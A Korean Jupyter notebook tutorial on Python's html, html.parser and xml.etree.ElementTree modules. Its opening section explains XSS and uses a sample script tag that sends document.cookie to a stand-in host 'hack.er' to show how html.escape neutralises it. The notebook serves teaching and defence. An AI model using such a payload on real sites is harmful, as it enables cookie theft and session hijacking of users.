# XSS공격을 막으려면?
## html
### HTML문자를 이스케이프(escape)처리할 때 사용하는 모듈

XXS 공격이란?  

XSS 공격은 웹 응용프로그램에 존재하는 취약점을 기반으로 웹 서버와 클라이언트 간 통신 방식인 HTTP 프로토콜 동작과정 중에 발생합니다. XSS 공격은 웹사이트 관리자가 아닌 이가 웹페이지에 악성 스크립트를 삽입할 수 있는 취약점입니다. 주로 여러 사용자가 보는 게시판에 악성 스크립트가 담긴 글을 올리는 형태로 이루어집니다.

In [3]:
import html

src = '<script>location.href="http://hack.er/Cookie.php?cookie="+document.cookie</script>'
result = html.escape(src)

# 이처럼 이스케이프된 문자열은 브라우저에서는 입력한 그대로 보이지만 HTML 본연의 태그나 스크립트 기능은 사라진 상태
print(result)

&lt;script&gt;location.href=&quot;http://hack.er/Cookie.php?cookie=&quot;+document.cookie&lt;/script&gt;


In [4]:
#  이스케이프된 문자열을 원래의 HTML로 되돌릴 때는 html.unescap() 함수를 사용
html.unescape(result)

'<script>location.href="http://hack.er/Cookie.php?cookie="+document.cookie</script>'

# 웹 페이지에서 원하는 텍스트만 뽑으려면?
## html.parser
### HTML 문서를 파싱할 때 사용하는 모듈

In [6]:
'''
<html>
<head>
<title>Python Zen</title>
</head>
<body>
<h2>The Zen of Python, by Tim Peters</h2>
<ul>
  <li>Beautiful is better than ugly.</li>
  <li>Explicit is better than implicit.</li>
  <li>Simple is better than complex.</li>
  <li>Complex is better than complicated.</li>
  <li>Flat is better than nested.</li>
  <li>Sparse is better than dense.</li>
  <li>Readability counts.</li>
  <li>Special cases aren't special enough to break the rules.</li>
  <li>Although <strong>practicality</strong> beats purity.</li>
  <li>Errors should <strong>never</strong> pass silently.</li>
  <li>Unless explicitly silenced.</li>
  <li>In the face of ambiguity, refuse the temptation to guess.</li>
  <li>There should be one-- and preferably only one --obvious way to do it.</li>
  <li>Although that way may not be obvious at first unless you're Dutch.</li>
  <li><strong>Now</strong> is better than never.</li>
  <li>Although never is often better than <strong>right</strong> now.</li>
  <li>If the implementation is hard to explain, it's a bad idea.</li>
  <li>If the implementation is easy to explain, it may be a good idea.</li>
  <li>Namespaces are one honking great idea -- let's do more of those!</li>
</ul>
</body>
</html>
'''

"\n<html>\n<head>\n<title>Python Zen</title>\n</head>\n<body>\n<h2>The Zen of Python, by Tim Peters</h2>\n<ul>\n  <li>Beautiful is better than ugly.</li>\n  <li>Explicit is better than implicit.</li>\n  <li>Simple is better than complex.</li>\n  <li>Complex is better than complicated.</li>\n  <li>Flat is better than nested.</li>\n  <li>Sparse is better than dense.</li>\n  <li>Readability counts.</li>\n  <li>Special cases aren't special enough to break the rules.</li>\n  <li>Although <strong>practicality</strong> beats purity.</li>\n  <li>Errors should <strong>never</strong> pass silently.</li>\n  <li>Unless explicitly silenced.</li>\n  <li>In the face of ambiguity, refuse the temptation to guess.</li>\n  <li>There should be one-- and preferably only one --obvious way to do it.</li>\n  <li>Although that way may not be obvious at first unless you're Dutch.</li>\n  <li><strong>Now</strong> is better than never.</li>\n  <li>Although never is often better than <strong>right</strong> now.</l

In [8]:
#위 HTML 파일에서 내용을 굵은 글씨로 표시하는 <strong> 태그와 </strong> 태그 사이의 문자열을 모두 찾아서 출력하는 프로그램을 만들려면?

from html.parser import HTMLParser


class MyHTMLParser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        self.is_strong = False

    def handle_starttag(self, tag, attrs):
        if tag == 'strong':  # <strong> 태그 시작
            self.is_strong = True

    def handle_endtag(self, tag):
        if tag == 'strong':  # </strong> 태그 닫힘
            self.is_strong = False

    def handle_data(self, data):
        if self.is_strong:  # <strong>~</strong> 구간인 경우
            print(data)     # 데이터를 출력


with open('015HTML.html') as f:
    parser = MyHTMLParser()
    parser.feed(f.read())

practicality
never
Now
right


# XML 문서를 만드려면?
## xml.etree.ElementTree
### XML문서를 만들 때 사용하는 모듈

In [9]:
#xml.etree.ElementTree 모듈을 사용하여 다음과 같은 note.xml 파일을 만들려면
'''
<note date="20120104">
    <to>Tove</to>
    <from>Jani</from>
    <heading>Reminder</heading>
    <body>Don't forget me this weekend!</body>
</note>
'''

'\n<note date="20120104">\n    <to>Tove</to>\n    <from>Jani</from>\n    <heading>Reminder</heading>\n    <body>Don\'t forget me this weekend!</body>\n</note>\n'

In [10]:

from xml.etree.ElementTree import Element, dump

note = Element("note")
to = Element("to")
to.text = "Tove"

note.append(to)
dump(note)  # note 엘리먼트를 XML로 출력

<note><to>Tove</to></note>


In [11]:
#서브엘리먼트(SubElement)를 이용하면 더 편리하게 태그를 추가할 수 있다.
from xml.etree.ElementTree import Element, SubElement, dump

note = Element("note")
to = Element("to")
to.text = "Tove"

note.append(to)
SubElement(note, "from").text = "Jani"  # 이 부분 추가!

dump(note)

<note><to>Tove</to><from>Jani</from></note>


In [12]:
#속성 추가
from xml.etree.ElementTree import Element, SubElement, dump

note = Element("note")
to = Element("to")
to.text = "Tove"

note.append(to)
SubElement(note, "from").text = "Jani"
note.attrib["date"] = "20120104"  # 이 부분 추가!

dump(note)

<note date="20120104"><to>Tove</to><from>Jani</from></note>


In [14]:
#위 note.xml 파일 작성 코드

from xml.etree.ElementTree import Element, SubElement, dump

note = Element("note")
note.attrib["date"] = "20120104"

to = Element("to")
to.text = "Tove"
note.append(to)

SubElement(note, "from").text = "Jani"
SubElement(note, "heading").text = "Reminder"
SubElement(note, "body").text = "Don't forget me this weekend!"
dump(note)

<note date="20120104"><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>Don't forget me this weekend!</body></note>


In [15]:
from xml.etree.ElementTree import Element, SubElement

note = Element("note")
note.attrib["date"] = "20120104"

to = Element("to")
to.text = "Tove"
note.append(to)

SubElement(note, "from").text = "Jani"
SubElement(note, "heading").text = "Reminder"
SubElement(note, "body").text = "Don't forget me this weekend!"

# XML 을 보기좋게 만들어 저장
from xml.dom import minidom
import xml.etree.ElementTree as ET
xmlstr = minidom.parseString(ET.tostring(note)).toprettyxml(indent="  ")
print(xmlstr)

# XML을 파일로 저장
with open('015note.xml', 'w') as f:
    f.write(xmlstr)

<?xml version="1.0" ?>
<note date="20120104">
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>



#  XML에서 엘리먼트와 콘텐츠를 읽으려면?
## xml.etree.ElementTree
### XML문서를 파싱하고 검색할 때 사용하는 모듈

In [16]:
from xml.etree.ElementTree import parse

tree = parse("015note.xml")
note = tree.getroot()

In [19]:
#속성값 읽기 
print(note.get("date", "19991231"))
print(note.keys())
print(note.items())

20120104
['date']
[('date', '20120104')]


In [20]:
#하위 엘리멘트 접근
from_tag = note.find("from")
from_tags = note.findall("from")
from_text = note.findtext("from")

In [31]:
#특정 태그의 모든 하위 엘리먼트를 순서대로 처리할 때는 다음처럼 iter() 함수를 사용

#from_childs = note.iter("from")

from xml.etree.ElementTree import parse

tree = parse("015note.xml")
note = tree.getroot()

print(note.get("date"))
for parent in tree.iter():
    for child in parent:
        print(child.text)

20120104
Tove
Jani
Reminder
Don't forget me this weekend!
